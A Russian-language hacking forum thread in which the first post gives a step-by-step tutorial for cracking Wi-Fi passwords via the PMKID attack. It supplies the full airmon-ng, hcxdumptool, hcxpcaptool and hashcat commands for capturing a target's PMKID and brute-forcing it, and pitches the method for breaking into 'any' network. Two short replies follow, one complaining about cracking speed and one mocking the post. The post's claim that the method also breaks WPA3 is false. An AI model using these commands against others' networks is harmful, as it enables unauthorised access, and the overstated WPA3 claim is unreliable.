• Начинающий хакер, спасибо что зашёл к нам! Для полного удобства рекомендуем Вам сразу же зарегистрироваться. Помните, необходимо придумать сложный пароль к своему логину, в котором будут присутствовать цифры, а так же символы. После регистрации вы сможете пользоваться чатом. Так же не забудьте активировать аккаунт через письмо, высланное вам на почту ! Администрация заботится о каждом из Вас...
  • Для просмотра разделов из категории Private Informations & Programms необходимо купить

Новый метод взлома Wi-Fi

HellPlaY21

Hell^ReBirth
Elite Premium

HellPlaY21

Hell^ReBirth
Elite Premium
Регистрация
2 Июл 2017
Сообщения
27
Реакции
3
Баллы
2
Telegram
@RSK_News
Шалом хацкеры, все мы знаем о протоколе шифрования WPA2, который используется сейчас во всех запароленных точках доступа.

Мало кто из вас знает, что пару месяцев назад Wi-Fi Alliance представил новый протокол шифрования WPA3.


Это не только большой шаг в области безопасности, но еще и новые трудности со взломом.
Пока протокол шифрования не распространился глобально, мы решили заранее решить вопрос с его взломом. И решили, друзья!

Теперь внимание - наш метод работает не только с новым WPA3 но и с распространенным повсеместно WPA2.

Способ будет актуален для взлома любой сети Wi-Fi прямо здесь и сейчас, а так же на долгое будущее.

Важное преимущество - нам не нужно перехватывать рукопожатие, а соответственно не нужно ждать, пока кто-то подключится к точке.


Приступим:

Все действия статьи буду выполнять в Debian
[HIDE]
Подготовка

Устанавливаем на нашу машину(возможно уже у кого то есть часть этих инструментов из коробки):

1. airmon-ng + airodump-ng
http://aircrack-ng.org/

2. hcxdumptool
https://github.com/ZerBea/hcxdumptool

3. hcxpcaptool
https://github.com/ZerBea/hcxtools

4. hashcat
https://hashcat.net/hashcat/

Продолжаем:


  • Первым делом запустим нашу карту в режим монитора.
sudo airmon-ng start wlan0



Имя своего wifi интерфейса можно посмотреть в набрав команду ifconfig (для меня это wlan0).

  • Далее начинаем захват пакетов с помощью утилиты airodump.
sudo airodump-ng wlan0mon

(wlna0mon - интерфейс монитора, который появится в списке ifconfig, после старта первой команды.)

Видим следующее:

9016


  • Из списка выбираем более или менее устойчивый.
Далее сохраняем его BSSID

echo "98DED0EF7060" > filter.txt

Обратите внимание что BSSID мы записываем без ":"


Теперь переходим к самому главному, друзья!



  • Первым шагом мы должны получить pmkid точки. Делается это так:
sudo hcxdumptool -o hash -i wlan0mon --filterlist=filter.txt --filtermode=2 --enable_status=1,2

Если вам интересны значения ключей, то вы можете почитать набрав hcxdumptool -h.

Основные --o hash - тут сохранится собственно сам pmkid. --i wlan0mon - интерфейс мониторящей карты. --filterlist - наш сохраненный bssid.

После того как ввели команду видим примерно следующее:

9017





Как только увидим надпись

[FOUND PMKID]

Жмем CTRL + C и приступаем к расшифровке.

  • Приведем наш pmkid в удобочитаемый вид для hashcat
sudo hcxpcaptool -z hashtocrack hash

  • Если набрать
cat hashtocrack

  • То получим примерно следующее
ef2115548399c67c69639f04feaeebdb:98ded0ef7060:28565aba7224



  • Далее заряжаем наш Hascat
Мы будем перебирать пароли, состоящие из 8 символов (Брут).

Сделаем мы это следующей командой:

sudo hashcat -m 16800 hashtocrack -a 3 -w 3 '?d?d?d?d?d?d?d?d' --force

'?d?d?d?d?d?d?d?d' - это собственно маска. По маскам можете почитать доки hashcat

  • Команда для перебора по словарю
sudo hashcat -m 16800 hashtocrack wordlist.txt --force



У нас hashcat производит брут с использованием GPU (видеокарты), по маске из 8 цифр (это 10кк паролей), перебирает чуть меньше часа. По словарям тоже очень быстро работает.
[/HIDE]
 

HUCKER_DUCKER

Пользователь
Местный

HUCKER_DUCKER

Пользователь
Местный
Регистрация
29 Авг 2018
Сообщения
34
Реакции
6
Баллы
1
HellPlaY21 написал(а):
Шалом хацкеры, все мы знаем о протоколе шифрования WPA2, который используется сейчас во всех запароленных точках доступа.

Мало кто из вас знает, что пару месяцев назад Wi-Fi Alliance представил новый протокол шифрования WPA3.



Пока протокол шифрования не распространился глобально, мы решили заранее решить вопрос с его взломом. И решили, друзья!

Теперь внимание - наш метод работает не только с новым WPA3 но и с распространенным повсеместно WPA2.

Способ будет актуален для взлома любой сети Wi-Fi прямо здесь и сейчас, а так же на долгое будущее.

Важное преимущество - нам не нужно перехватывать рукопожатие, а соответственно не нужно ждать, пока кто-то подключится к точке.


Приступим:


Без цитаты
Блин , на моем нетбуке с калей брут часа три будет (просто видюшка интергрированная)
 

The_hacker

Директор ФСБ
Топовый

The_hacker

Директор ФСБ
Топовый
Регистрация
14 Июн 2017
Сообщения
479
Реакции
119
Баллы
3
аа. но но но. ага ага.
А где новый метод взлома ?
 
Сверху Снизу